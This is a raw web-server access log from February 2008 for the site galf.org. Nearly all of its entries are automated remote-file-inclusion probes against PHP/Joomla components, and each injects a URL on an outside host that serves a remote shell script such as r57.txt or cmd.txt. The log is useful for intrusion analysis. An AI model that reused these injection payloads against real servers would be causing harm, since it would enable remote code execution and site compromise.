81.91.228.154 - - [24/Feb/2008:18:29:04 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
207.87.60.4 - - [24/Feb/2008:18:29:23 -0800] "GET /logs/access_070709.log//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.zuuniimedee.mn//modules/My_eGallery/data/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
207.87.60.4 - - [24/Feb/2008:18:29:24 -0800] "GET //modules/My_eGallery/public/displayCategory.php?adminpath=http://www.zuuniimedee.mn//modules/My_eGallery/data/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
207.87.60.4 - - [24/Feb/2008:18:29:24 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.zuuniimedee.mn//modules/My_eGallery/data/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
69.144.55.219 - - [24/Feb/2008:18:30:12 -0800] "GET /logs/access_070709.log//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.144.55.219 - - [24/Feb/2008:18:30:12 -0800] "GET //modules/My_eGallery/public/displayCategory.php?adminpath=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.144.55.219 - - [24/Feb/2008:18:30:13 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.111.176.86 - - [24/Feb/2008:18:30:16 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
89.111.176.86 - - [24/Feb/2008:18:30:17 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
89.111.176.86 - - [24/Feb/2008:18:30:17 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
194.79.75.195 - - [24/Feb/2008:18:30:23 -0800] "GET /logs/access_070917.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
194.79.75.195 - - [24/Feb/2008:18:30:23 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.87.60.4 - - [24/Feb/2008:18:30:32 -0800] "GET /logs/access_080114.log//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.zuuniimedee.mn//modules/My_eGallery/data/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
89.111.176.86 - - [24/Feb/2008:18:30:47 -0800] "GET /logs/access_070917.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.86 - - [24/Feb/2008:18:30:47 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.9.138 - - [24/Feb/2008:18:30:54 -0800] "GET /logs/access.log//index2.php?pagina=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
87.106.9.138 - - [24/Feb/2008:18:30:54 -0800] "GET /logs//index2.php?pagina=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
62.44.72.170 - - [24/Feb/2008:18:31:46 -0800] "GET /logs/access_080114.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/dkyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.44.72.170 - - [24/Feb/2008:18:31:46 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/dkyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.44.72.170 - - [24/Feb/2008:18:31:47 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/dkyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.183.98.30 - - [24/Feb/2008:18:31:52 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.servstra.com/forums/html/avatars/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
69.144.55.219 - - [24/Feb/2008:18:32:02 -0800] "GET /logs/access_080114.log//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.72.221.130 - - [24/Feb/2008:18:32:13 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.54.50.73 - - [24/Feb/2008:18:32:24 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.216.216.229 - - [24/Feb/2008:18:32:32 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
87.216.216.229 - - [24/Feb/2008:18:32:38 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
87.216.216.229 - - [24/Feb/2008:18:32:43 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
74.95.82.113 - - [24/Feb/2008:18:33:48 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
206.33.2.131 - - [24/Feb/2008:18:34:01 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
206.33.2.131 - - [24/Feb/2008:18:34:01 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
206.33.2.131 - - [24/Feb/2008:18:34:01 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
87.216.216.229 - - [24/Feb/2008:18:34:21 -0800] "GET /logs/access_070917.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.216.216.229 - - [24/Feb/2008:18:34:26 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
206.33.2.131 - - [24/Feb/2008:18:34:39 -0800] "GET /logs/access_070917.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
206.33.2.131 - - [24/Feb/2008:18:34:41 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.67.20.21 - - [24/Feb/2008:18:35:30 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
77.222.131.65 - - [24/Feb/2008:18:35:56 -0800] "GET /administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
77.222.131.65 - - [24/Feb/2008:18:36:00 -0800] "GET /logs/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
80.67.20.21 - - [24/Feb/2008:18:36:04 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
194.79.75.195 - - [24/Feb/2008:18:36:18 -0800] "GET /logs/access_080114.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.101.240.7 - - [24/Feb/2008:18:37:20 -0800] "GET /newspublish/include.php?path[docroot]=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "galf.org"
87.101.240.6 - - [24/Feb/2008:18:37:21 -0800] "GET /logs/newspublish/include.php?path[docroot]=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "galf.org"
87.101.240.6 - - [24/Feb/2008:18:37:42 -0800] "GET /newspublish/include.php?path[docroot]=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
87.101.240.8 - - [24/Feb/2008:18:37:42 -0800] "GET /logs/newspublish/include.php?path[docroot]=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
74.95.82.113 - - [24/Feb/2008:18:38:12 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.95.82.113 - - [24/Feb/2008:18:38:12 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.95.82.113 - - [24/Feb/2008:18:39:02 -0800] "GET /logs/access_080114.log/modules/My_eGallery/index.php?basepath=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
203.211.145.2 - - [24/Feb/2008:18:39:33 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:39:54 -0800] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
163.191.85.7 - - [24/Feb/2008:18:39:55 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
163.191.85.7 - - [24/Feb/2008:18:39:55 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
163.191.85.7 - - [24/Feb/2008:18:41:16 -0800] "GET /logs/access_080114.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:41:17 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.65.169.43 - - [24/Feb/2008:18:42:30 -0800] "GET /logs/access_080114.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.karitasi.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.65.169.43 - - [24/Feb/2008:18:42:30 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.karitasi.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.65.169.43 - - [24/Feb/2008:18:42:31 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.karitasi.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.117.225.155 - - [24/Feb/2008:18:43:39 -0800] "GET /logs/access.log/newspublish/include.php?path[docroot]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
87.117.225.155 - - [24/Feb/2008:18:43:40 -0800] "GET /newspublish/include.php?path[docroot]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
87.117.225.155 - - [24/Feb/2008:18:43:40 -0800] "GET /logs/newspublish/include.php?path[docroot]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
82.35.84.213 - - [24/Feb/2008:18:43:48 -0800] "GET /logs/access_070917.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://avvvv.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.30.249.129 - - [24/Feb/2008:18:43:49 -0800] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://avvvv.altervista.org/ascomand.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.35.84.213 - - [24/Feb/2008:18:43:49 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://avvvv.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.169.132.236 - - [24/Feb/2008:18:43:55 -0800] "GET /logs/access_080114.log//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.132.236 - - [24/Feb/2008:18:43:55 -0800] "GET //modules/My_eGallery/public/displayCategory.php?adminpath=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.132.236 - - [24/Feb/2008:18:43:56 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.117.225.155 - - [24/Feb/2008:18:44:20 -0800] "GET /logs/access_080114.log/newspublish/include.php?path[docroot]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.225.155 - - [24/Feb/2008:18:44:21 -0800] "GET /newspublish/include.php?path[docroot]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.225.155 - - [24/Feb/2008:18:44:21 -0800] "GET /logs/newspublish/include.php?path[docroot]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.177.226.178 - - [24/Feb/2008:18:44:35 -0800] "GET /send_reminders.php?includedir=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
67.195.58.178 - - [24/Feb/2008:18:45:03 -0800] "GET /logs/access_070917.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
203.211.145.2 - - [24/Feb/2008:18:45:09 -0800] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:45:35 -0800] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
163.191.85.7 - - [24/Feb/2008:18:45:35 -0800] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
163.191.85.7 - - [24/Feb/2008:18:45:35 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
81.176.226.180 - - [24/Feb/2008:18:45:37 -0800] "GET /logs/access_080114.log//components/com_pollxt/languages/germani.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.176.226.180 - - [24/Feb/2008:18:45:38 -0800] "GET //components/com_pollxt/languages/germani.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.176.226.180 - - [24/Feb/2008:18:45:38 -0800] "GET /logs//components/com_pollxt/languages/germani.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.211.145.2 - - [24/Feb/2008:18:46:20 -0800] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
163.191.85.7 - - [24/Feb/2008:18:47:58 -0800] "GET /logs/access_080114.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:47:58 -0800] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:47:58 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:48:25 -0800] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
163.191.85.7 - - [24/Feb/2008:18:48:26 -0800] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
163.191.85.7 - - [24/Feb/2008:18:48:26 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
163.191.85.7 - - [24/Feb/2008:18:49:17 -0800] "GET /logs/access_070917.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:49:17 -0800] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:49:17 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:50:55 -0800] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
163.191.85.7 - - [24/Feb/2008:18:50:55 -0800] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
163.191.85.7 - - [24/Feb/2008:18:50:55 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
67.192.106.18 - - [24/Feb/2008:18:52:20 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.e-realestate-loans.com/realestate/inserts/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.103.136.225 - - [24/Feb/2008:18:53:38 -0800] "GET /logs/access.log//?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
201.103.136.225 - - [24/Feb/2008:18:53:41 -0800] "GET //?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "galf.org"
201.103.136.225 - - [24/Feb/2008:18:53:43 -0800] "GET /logs//?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 200 6234 "-" "libwww-perl/5.805" "galf.org"
163.191.85.7 - - [24/Feb/2008:18:55:01 -0800] "GET /logs/access_070917.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:55:02 -0800] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:55:02 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:55:03 -0800] "GET /logs/access_080114.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:55:07 -0800] "GET /logs/access_070917.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:55:07 -0800] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:55:07 -0800] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.67.20.21 - - [24/Feb/2008:18:56:00 -0800] "GET /logs/access_080114.log/modules/My_eGallery/index.php?basepath=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.67.20.21 - - [24/Feb/2008:18:56:01 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.67.20.21 - - [24/Feb/2008:18:56:01 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.67.20.21 - - [24/Feb/2008:18:56:18 -0800] "GET /logs/access_080114.log/modules/My_eGallery/index.php?basepath=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.67.20.21 - - [24/Feb/2008:18:56:18 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.67.20.21 - - [24/Feb/2008:18:56:18 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:57:01 -0800] "GET /logs/access_080114.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:57:01 -0800] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:57:02 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:58:58 -0800] "GET /logs/access_071014.log//newspublish/include.php?path%5Bdocroot%5D=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:58:58 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:58:59 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.228.158.38 - - [24/Feb/2008:18:59:00 -0800] "GET /logs/access_080114.log//index2.php?pagina=http://www.ciifen-int.org//modules/Forums/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.228.158.38 - - [24/Feb/2008:18:59:00 -0800] "GET //index2.php?pagina=http://www.ciifen-int.org//modules/Forums/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
